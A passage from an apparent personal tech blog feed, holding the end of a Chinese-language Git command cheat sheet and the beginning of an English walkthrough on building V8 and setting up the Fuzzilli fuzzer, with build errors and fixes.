href="#显示与上次提交版本文件的不同:" class="headerlink" title="显示与上次提交版本文件的不同:"></a>显示与上次提交版本文件的不同:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git diff</span><br></pre></td></tr></table></figure><h5 id="把当前所有修改添加到下次提交中:"><a href="#把当前所有修改添加到下次提交中:" class="headerlink" title="把当前所有修改添加到下次提交中:"></a>把当前所有修改添加到下次提交中:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git add .</span><br></pre></td></tr></table></figure><h5 id="把对某个文件的修改添加到下次提交中:"><a href="#把对某个文件的修改添加到下次提交中:" class="headerlink" title="把对某个文件的修改添加到下次提交中:"></a>把对某个文件的修改添加到下次提交中:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git add -p <file></span><br></pre></td></tr></table></figure><h5 id="提交本地的所有修改:"><a href="#提交本地的所有修改:" class="headerlink" title="提交本地的所有修改:"></a>提交本地的所有修改:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git commit -a</span><br></pre></td></tr></table></figure><h5 id="提交之前已标记的变化:"><a href="#提交之前已标记的变化:" class="headerlink" title="提交之前已标记的变化:"></a>提交之前已标记的变化:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git commit</span><br></pre></td></tr></table></figure><h5 id="附加消息提交:"><a href="#附加消息提交:" class="headerlink" title="附加消息提交:"></a>附加消息提交:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git commit -m 'message here'</span><br></pre></td></tr></table></figure><h5 id="提交,并将提交时间设置为之前的某个日期"><a href="#提交,并将提交时间设置为之前的某个日期" class="headerlink" title="提交,并将提交时间设置为之前的某个日期:"></a>提交,并将提交时间设置为之前的某个日期:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git commit --date="`date --date='n day ago'`" -am "Commit Message"</span><br></pre></td></tr></table></figure><h5 id="修改上次提交"><a href="#修改上次提交" class="headerlink" title="修改上次提交"></a>修改上次提交</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git commit --amend</span><br></pre></td></tr></table></figure><h5 id="修改上次提交的committer-date:"><a href="#修改上次提交的committer-date:" class="headerlink" title="修改上次提交的committer date:"></a>修改上次提交的committer date:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GIT_COMMITTER_DATE="date" git commit --amend</span><br></pre></td></tr></table></figure><h5 id="修改上次提交的author-date:"><a href="#修改上次提交的author-date:" class="headerlink" title="修改上次提交的author date:"></a>修改上次提交的author date:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git commit --amend --date="date"</span><br></pre></td></tr></table></figure><h5 id="把当前分支中未提交的修改移动到其他分支:"><a href="#把当前分支中未提交的修改移动到其他分支:" class="headerlink" title="把当前分支中未提交的修改移动到其他分支:"></a>把当前分支中未提交的修改移动到其他分支:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">git stash</span><br><span class="line">git checkout branch2</span><br><span class="line">git stash pop</span><br></pre></td></tr></table></figure><h5 id="将-stashed-changes-应用到当前分支:"><a href="#将-stashed-changes-应用到当前分支:" class="headerlink" title="将 stashed changes 应用到当前分支:"></a>将 stashed changes 应用到当前分支:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git stash apply</span><br></pre></td></tr></table></figure><h5 id="删除最新一次的-stashed-changes:"><a href="#删除最新一次的-stashed-changes:" class="headerlink" title="删除最新一次的 stashed changes:"></a>删除最新一次的 stashed changes:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git stash drop</span><br></pre></td></tr></table></figure><p><strong>把bug提交的修改复制到当前分支</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git cherry-pick <commit></span><br></pre></td></tr></table></figure><h4 id="搜索"><a href="#搜索" class="headerlink" title="搜索"></a>搜索</h4><h5 id="从当前目录的所有文件中查找文本内容:"><a href="#从当前目录的所有文件中查找文本内容:" class="headerlink" title="从当前目录的所有文件中查找文本内容:"></a>从当前目录的所有文件中查找文本内容:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git grep "Hello"</span><br></pre></td></tr></table></figure><h5 id="在某一版本中搜索文本:"><a href="#在某一版本中搜索文本:" class="headerlink" title="在某一版本中搜索文本:"></a>在某一版本中搜索文本:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git grep "Hello" v2.5</span><br></pre></td></tr></table></figure><h4 id="提交历史"><a href="#提交历史" class="headerlink" title="提交历史"></a>提交历史</h4><h5 id="从最新提交开始,显示所有的提交记录(显示hash,-作者信息,提交的标题和时间):"><a href="#从最新提交开始,显示所有的提交记录(显示hash,-作者信息,提交的标题和时间):" class="headerlink" title="从最新提交开始,显示所有的提交记录(显示hash, 作者信息,提交的标题和时间):"></a>从最新提交开始,显示所有的提交记录(显示hash, 作者信息,提交的标题和时间):</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git log</span><br></pre></td></tr></table></figure><h5 id="显示所有提交(仅显示提交的hash和message):"><a href="#显示所有提交(仅显示提交的hash和message):" class="headerlink" title="显示所有提交(仅显示提交的hash和message):"></a>显示所有提交(仅显示提交的hash和message):</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git log --oneline</span><br></pre></td></tr></table></figure><h5 id="显示某个用户的所有提交:"><a href="#显示某个用户的所有提交:" class="headerlink" title="显示某个用户的所有提交:"></a>显示某个用户的所有提交:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git log --author="username"</span><br></pre></td></tr></table></figure><h5 id="显示某个文件的所有修改:"><a href="#显示某个文件的所有修改:" class="headerlink" title="显示某个文件的所有修改:"></a>显示某个文件的所有修改:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git log -p <file></span><br></pre></td></tr></table></figure><h5 id="仅显示远端-lt-remote-master-gt-分支与远端-lt-origin-master-gt-分支提交记录的差集:"><a href="#仅显示远端-lt-remote-master-gt-分支与远端-lt-origin-master-gt-分支提交记录的差集:" class="headerlink" title="仅显示远端<remote/master>分支与远端<origin/master>分支提交记录的差集:"></a>仅显示远端<remote/master>分支与远端<origin/master>分支提交记录的差集:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git log --oneline <origin/master>..<remote/master> --left-right</span><br></pre></td></tr></table></figure><h5 id="谁,在什么时间,修改了文件的什么内容:"><a href="#谁,在什么时间,修改了文件的什么内容:" class="headerlink" title="谁,在什么时间,修改了文件的什么内容:"></a>谁,在什么时间,修改了文件的什么内容:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git blame <file></span><br></pre></td></tr></table></figure><h5 id="显示reflog:"><a href="#显示reflog:" class="headerlink" title="显示reflog:"></a>显示reflog:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git reflog show </span><br></pre></td></tr></table></figure><h5 id="删除reflog:"><a href="#删除reflog:" class="headerlink" title="删除reflog:"></a>删除reflog:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git reflog delete</span><br></pre></td></tr></table></figure><h4 id="分支与标签"><a href="#分支与标签" class="headerlink" title="分支与标签"></a>分支与标签</h4><h5 id="列出所有的分支:"><a href="#列出所有的分支:" class="headerlink" title="列出所有的分支:"></a>列出所有的分支:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git branch</span><br></pre></td></tr></table></figure><h5 id="列出所有的远端分支:"><a href="#列出所有的远端分支:" class="headerlink" title="列出所有的远端分支:"></a>列出所有的远端分支:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git branch -r</span><br></pre></td></tr></table></figure><h5 id="切换分支:"><a href="#切换分支:" class="headerlink" title="切换分支:"></a>切换分支:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git checkout <branch></span><br></pre></td></tr></table></figure><h5 id="创建并切换到新分支"><a href="#创建并切换到新分支" class="headerlink" title="创建并切换到新分支:"></a>创建并切换到新分支:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git checkout -b <branch></span><br></pre></td></tr></table></figure><h5 id="基于当前分支创建新分支:"><a href="#基于当前分支创建新分支:" class="headerlink" title="基于当前分支创建新分支:"></a>基于当前分支创建新分支:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git branch <new-branch></span><br></pre></td></tr></table></figure><h5 id="基于远程分支创建新的可追溯的分支:"><a href="#基于远程分支创建新的可追溯的分支:" class="headerlink" title="基于远程分支创建新的可追溯的分支:"></a>基于远程分支创建新的可追溯的分支:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git branch --track <new-branch> <remote-branch></span><br></pre></td></tr></table></figure><h5 id="删除本地分支"><a href="#删除本地分支" class="headerlink" title="删除本地分支:"></a>删除本地分支:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git branch -d <branch></span><br></pre></td></tr></table></figure><h5 id="强制删除一个本地分支:"><a href="#强制删除一个本地分支:" class="headerlink" title="强制删除一个本地分支:"></a>强制删除一个本地分支:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git branch -D <branch></span><br></pre></td></tr></table></figure><h5 id="给当前版本打标签:"><a href="#给当前版本打标签:" class="headerlink" title="给当前版本打标签:"></a>给当前版本打标签:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git tag <tag-name></span><br></pre></td></tr></table></figure><h5 id="给当前版本打标签并附加消息:"><a href="#给当前版本打标签并附加消息:" class="headerlink" title="给当前版本打标签并附加消息:"></a>给当前版本打标签并附加消息:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git tag -a <tag-name></span><br></pre></td></tr></table></figure><hr><h4 id="更新与发布"><a href="#更新与发布" class="headerlink" title="更新与发布"></a>更新与发布</h4><h5 id="列出当前配置的远程端:"><a href="#列出当前配置的远程端:" class="headerlink" title="列出当前配置的远程端:"></a>列出当前配置的远程端:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git remote -v</span><br></pre></td></tr></table></figure><h5 id="显示远程端的信息:"><a href="#显示远程端的信息:" class="headerlink" title="显示远程端的信息:"></a>显示远程端的信息:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git remote show <remote></span><br></pre></td></tr></table></figure><h5 id="添加新的远程端:"><a href="#添加新的远程端:" class="headerlink" title="添加新的远程端:"></a>添加新的远程端:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git remote add <remote> <url></span><br></pre></td></tr></table></figure><h5 id="下载远程端版本,但不合并到HEAD中:"><a href="#下载远程端版本,但不合并到HEAD中:" class="headerlink" title="下载远程端版本,但不合并到HEAD中:"></a>下载远程端版本,但不合并到HEAD中:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git fetch <remote></span><br></pre></td></tr></table></figure><h5 id="下载远程端版本,并自动与HEAD版本合并:"><a href="#下载远程端版本,并自动与HEAD版本合并:" class="headerlink" title="下载远程端版本,并自动与HEAD版本合并:"></a>下载远程端版本,并自动与HEAD版本合并:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git remote pull <remote> <url></span><br></pre></td></tr></table></figure><h5 id="将远程端版本合并到本地版本中:"><a href="#将远程端版本合并到本地版本中:" class="headerlink" title="将远程端版本合并到本地版本中:"></a>将远程端版本合并到本地版本中:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git pull origin master</span><br></pre></td></tr></table></figure><h5 id="以rebase方式将远端分支与本地合并:"><a href="#以rebase方式将远端分支与本地合并:" class="headerlink" title="以rebase方式将远端分支与本地合并:"></a>以rebase方式将远端分支与本地合并:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git pull --rebase <remote> <branch></span><br></pre></td></tr></table></figure><h5 id="将本地版本发布到远程端:"><a href="#将本地版本发布到远程端:" class="headerlink" title="将本地版本发布到远程端:"></a>将本地版本发布到远程端:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git push <remote> <branch></span><br></pre></td></tr></table></figure><h5 id="删除远程端分支:"><a href="#删除远程端分支:" class="headerlink" title="删除远程端分支:"></a>删除远程端分支:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ git push <remote> :<branch> (since Git v1.5.0)</span><br><span class="line">or</span><br><span class="line">git push <remote> --delete <branch> (since Git v1.7.0)</span><br></pre></td></tr></table></figure><h5 id="发布标签"><a href="#发布标签" class="headerlink" title="发布标签:"></a>发布标签:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git push --tags</span><br></pre></td></tr></table></figure><h4 id="合并与重置-Rebase"><a href="#合并与重置-Rebase" class="headerlink" title="合并与重置(Rebase)"></a>合并与重置(Rebase)</h4><h5 id="将分支合并到当前HEAD中:"><a href="#将分支合并到当前HEAD中:" class="headerlink" title="将分支合并到当前HEAD中:"></a>将分支合并到当前HEAD中:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git merge <branch></span><br></pre></td></tr></table></figure><h5 id="将当前HEAD版本重置到分支中"><a href="#将当前HEAD版本重置到分支中" class="headerlink" title="将当前HEAD版本重置到分支中:"></a>将当前HEAD版本重置到分支中:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git rebase <branch></span><br></pre></td></tr></table></figure><h5 id="退出重置"><a href="#退出重置" class="headerlink" title="退出重置:"></a>退出重置:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git rebase --abort</span><br></pre></td></tr></table></figure><h5 id="解决冲突后继续重置:"><a href="#解决冲突后继续重置:" class="headerlink" title="解决冲突后继续重置:"></a>解决冲突后继续重置:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git rebase --continue</span><br></pre></td></tr></table></figure><h5 id="使用配置好的merge-tool-解决冲突:"><a href="#使用配置好的merge-tool-解决冲突:" class="headerlink" title="使用配置好的merge tool 解决冲突:"></a>使用配置好的merge tool 解决冲突:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git mergetool</span><br></pre></td></tr></table></figure><h5 id="在编辑器中手动解决冲突后,标记文件为已解决冲突:"><a href="#在编辑器中手动解决冲突后,标记文件为已解决冲突:" class="headerlink" title="在编辑器中手动解决冲突后,标记文件为已解决冲突:"></a>在编辑器中手动解决冲突后,标记文件为<code>已解决冲突</code>:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git add <resolved-file></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git rm <resolved-file></span><br></pre></td></tr></table></figure><h5 id="合并提交:"><a href="#合并提交:" class="headerlink" title="合并提交:"></a>合并提交:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git rebase -i <commit-just-before-first></span><br></pre></td></tr></table></figure><p>把上面的内容替换为下面的内容:</p><p>原内容:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">pick <commit_id></span><br><span class="line">pick <commit_id2></span><br><span class="line">pick <commit_id3></span><br></pre></td></tr></table></figure><p>替换为:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">pick <commit_id></span><br><span class="line">squash <commit_id2></span><br><span class="line">squash <commit_id3></span><br></pre></td></tr></table></figure><h4 id="撤销"><a href="#撤销" class="headerlink" title="撤销"></a>撤销</h4><h5 id="放弃工作目录下的所有修改:"><a href="#放弃工作目录下的所有修改:" class="headerlink" title="放弃工作目录下的所有修改:"></a>放弃工作目录下的所有修改:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git reset --hard HEAD</span><br></pre></td></tr></table></figure><h5 id="移除缓存区的所有文件(i-e-撤销上次git-add)"><a href="#移除缓存区的所有文件(i-e-撤销上次git-add)" class="headerlink" title="移除缓存区的所有文件(i.e. 撤销上次git add):"></a>移除缓存区的所有文件(i.e. 撤销上次<code>git add</code>):</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git reset HEAD</span><br></pre></td></tr></table></figure><h5 id="放弃某个文件的所有本地修改:"><a href="#放弃某个文件的所有本地修改:" class="headerlink" title="放弃某个文件的所有本地修改:"></a>放弃某个文件的所有本地修改:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git checkout HEAD <file></span><br></pre></td></tr></table></figure><h5 id="重置一个提交(通过创建一个截然不同的新提交)"><a href="#重置一个提交(通过创建一个截然不同的新提交)" class="headerlink" title="重置一个提交(通过创建一个截然不同的新提交)"></a>重置一个提交(通过创建一个截然不同的新提交)</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git revert <commit></span><br></pre></td></tr></table></figure><h5 id="将HEAD重置到指定的版本,并抛弃该版本之后的所有修改:"><a href="#将HEAD重置到指定的版本,并抛弃该版本之后的所有修改:" class="headerlink" title="将HEAD重置到指定的版本,并抛弃该版本之后的所有修改:"></a>将HEAD重置到指定的版本,并抛弃该版本之后的所有修改:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git reset --hard <commit></span><br></pre></td></tr></table></figure><h5 id="用远端分支强制覆盖本地分支:"><a href="#用远端分支强制覆盖本地分支:" class="headerlink" title="用远端分支强制覆盖本地分支:"></a>用远端分支强制覆盖本地分支:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git reset --hard <remote/branch> e.g., upstream/master, origin/my-feature</span><br></pre></td></tr></table></figure><h5 id="将HEAD重置到上一次提交的版本,并将之后的修改标记为未添加到缓存区的修改:"><a href="#将HEAD重置到上一次提交的版本,并将之后的修改标记为未添加到缓存区的修改:" class="headerlink" title="将HEAD重置到上一次提交的版本,并将之后的修改标记为未添加到缓存区的修改:"></a>将HEAD重置到上一次提交的版本,并将之后的修改标记为未添加到缓存区的修改:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git reset <commit></span><br></pre></td></tr></table></figure><h5 id="将HEAD重置到上一次提交的版本,并保留未提交的本地修改:"><a href="#将HEAD重置到上一次提交的版本,并保留未提交的本地修改:" class="headerlink" title="将HEAD重置到上一次提交的版本,并保留未提交的本地修改:"></a>将HEAD重置到上一次提交的版本,并保留未提交的本地修改:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git reset --keep <commit></span><br></pre></td></tr></table></figure><h5 id="删除添加-gitignore文件前错误提交的文件:"><a href="#删除添加-gitignore文件前错误提交的文件:" class="headerlink" title="删除添加.gitignore文件前错误提交的文件:"></a>删除添加<code>.gitignore</code>文件前错误提交的文件:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ git rm -r --cached .</span><br><span class="line">$ git add .</span><br><span class="line">$ git commit -m "remove xyz file"</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><p>这篇文章是我在上一份工作中完成的,现在分享出来希望能帮到大家 ;)</p>
<p><a href="https://git-scm.com/docs/">官方文档</a> 方便查阅~</p></summary>
<category term="CI/CD" scheme="https://f23y.github.io/categories/CI-CD/"/>
<category term="Git" scheme="https://f23y.github.io/tags/Git/"/>
</entry>
<entry>
<title>Fuzzing101 V8</title>
<link href="https://f23y.github.io/2023/06/09/Fuzzing101%20V8/"/>
<id>https://f23y.github.io/2023/06/09/Fuzzing101%20V8/</id>
<published>2023-06-08T15:14:33.000Z</published>
<updated>2025-09-27T10:59:12.314Z</updated>
<content type="html"><![CDATA[<p><a href="https://github.com/antonio-morales/Fuzzing101/tree/main/Exercise%2010">https://github.com/antonio-morales/Fuzzing101/tree/main/Exercise%2010</a></p><p><strong>Note!!!</strong> Fuzzilli-0.9 is an unsuccessful attempt. It is recommended to start directly with the latest version of Fuzzilli (starting from the “Let’s Fuzz!” section).</p><p>System: Ubuntu 20.04 LTS</p><span id="more"></span><h2 id="Environment-Configuration"><a href="#Environment-Configuration" class="headerlink" title="Environment Configuration"></a>Environment Configuration</h2><h3 id="Fuzzilli-0-9"><a href="#Fuzzilli-0-9" class="headerlink" title="Fuzzilli-0.9"></a>Fuzzilli-0.9</h3><p>Execute according to the following command and find an error, because libcurl3 and libcurl4 conflict, just remove libcurl3, follow the prompts to continue the installation.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~$ sudo apt --yes install clang libcurl3 libpython2.7 libpython2.7-dev libcurl4 git</span><br><span class="line">Reading package lists... Done</span><br><span class="line">Building dependency tree </span><br><span class="line">Reading state information... Done</span><br><span class="line">Package libcurl3 is not available, but is referred to by another package.</span><br><span class="line">This may mean that the package is missing, has been obsoleted, or</span><br><span class="line">is only available from another <span class="built_in">source</span></span><br><span class="line">However the following packages replace it:</span><br><span class="line"> libcurl4:i386 libcurl4</span><br><span class="line"></span><br><span class="line">E: Package <span class="string">'libcurl3'</span> has no installation candidate</span><br></pre></td></tr></table></figure><p>Next, an error is reported in this step, so libncurses5 is installed and continues to run, and an error is reported again.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~/fuzzilli-0.9$ swift build -c release -Xlinker=<span class="string">'-lrt'</span></span><br><span class="line">swift: error <span class="keyword">while</span> loading shared libraries: libtinfo.so.5: cannot open shared object file: No such file or directory</span><br><span class="line">fr3y@ubuntu:~$ sudo apt install libncurses5</span><br><span class="line">fr3y@ubuntu:~/fuzzilli-0.9$ swift build -c release -Xlinker=<span class="string">'-lrt'</span></span><br><span class="line">/usr/share/swift/usr/bin/swift-build: error <span class="keyword">while</span> loading shared libraries: libicuuc.so.60: cannot open shared object file: No such file or directory</span><br></pre></td></tr></table></figure><p>Just install this and make sure clang is installed.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> ~/Downloads</span><br><span class="line">wget http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu60_60.2-3ubuntu3.2_amd64.deb</span><br><span class="line">sudo apt-get install ./libicu60_60.2-3ubuntu3.2_amd64.deb</span><br></pre></td></tr></table></figure><p>Successfully installed fuzzilli…</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~/fuzzilli-0.9$ swift build -c release -Xlinker=<span class="string">'-lrt'</span></span><br><span class="line">Compile libsocket socket.c</span><br><span class="line">Compile libreprl libreprl.c</span><br><span class="line">Compile libforkserver forkserver.c</span><br><span class="line">Compile libcoverage coverage.c</span><br><span class="line">Compile Swift Module <span class="string">'Fuzzilli'</span> (60 sources)</span><br><span class="line">Compile Swift Module <span class="string">'FuzzilliCli'</span> (8 sources)</span><br><span class="line">Linking ./.build/x86_64-unknown-linux/release/FuzzilliCli</span><br></pre></td></tr></table></figure><p>Then follow the steps to get V8 source code.</p><p>Compile V8 with coverage instrumentation.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~/v8$ cp /home/fr3y/fuzzilli-0.9/Targets/V8/v8.patch ./</span><br><span class="line">fr3y@ubuntu:~/v8$ gn gen out/fuzzbuild --args=<span class="string">'is_debug=false dcheck_always_on=true v8_static_library=true v8_enable_slow_dchecks=true v8_enable_v8_checks=true v8_enable_verify_heap=true v8_enable_verify_csa=true v8_enable_verify_predictable=true sanitizer_coverage_flags="trace-pc-guard" target_cpu="x64"'</span></span><br><span class="line">Done. Made 122 targets from 81 files <span class="keyword">in</span> 185ms</span><br><span class="line">fr3y@ubuntu:~/v8$ ninja -C ./out/fuzzbuild</span><br><span class="line">ninja: Entering directory `./out/fuzzbuild<span class="string">'</span></span><br><span class="line"><span class="string">[1711/1711] STAMP obj/gn_all.stamp</span></span><br></pre></td></tr></table></figure><p>Because whether using the old version of fuzzilli, swift or v8, an error will occur eventually. This problem can probably be solved by reinstalling each of them again with the same version, but I will directly use the latest version here.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[REPRL] Failed to communicate with child process</span><br></pre></td></tr></table></figure><h3 id="Let’s-Fuzz"><a href="#Let’s-Fuzz" class="headerlink" title="Let’s Fuzz!"></a>Let’s Fuzz!</h3><h4 id="Build-V8"><a href="#Build-V8" class="headerlink" title="Build V8"></a>Build V8</h4><ol><li>Install dependencies: <code>fr3y@ubuntu:~/v8$ ./build/install-build-deps.sh -no-chromeos-fonts</code></li><li>Use gn to generate build files: <code>fr3y@ubuntu:~/v8$ gn gen out/Release "--args=is_debug=false"</code></li><li>Compile: <code>fr3y@ubuntu:~/v8$ ninja -C out/Release</code></li><li>Check the d8 binary by:</li></ol><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~/v8$ ./out/Release/d8 ./<span class="built_in">test</span>/fuzzer/parser/hello-world</span><br><span class="line">hello world</span><br></pre></td></tr></table></figure><h4 id="Fuzzilli"><a href="#Fuzzilli" class="headerlink" title="Fuzzilli"></a>Fuzzilli</h4><p>Finally, I used the latest version of fuzzilli to fuzz the latest version of v8, and 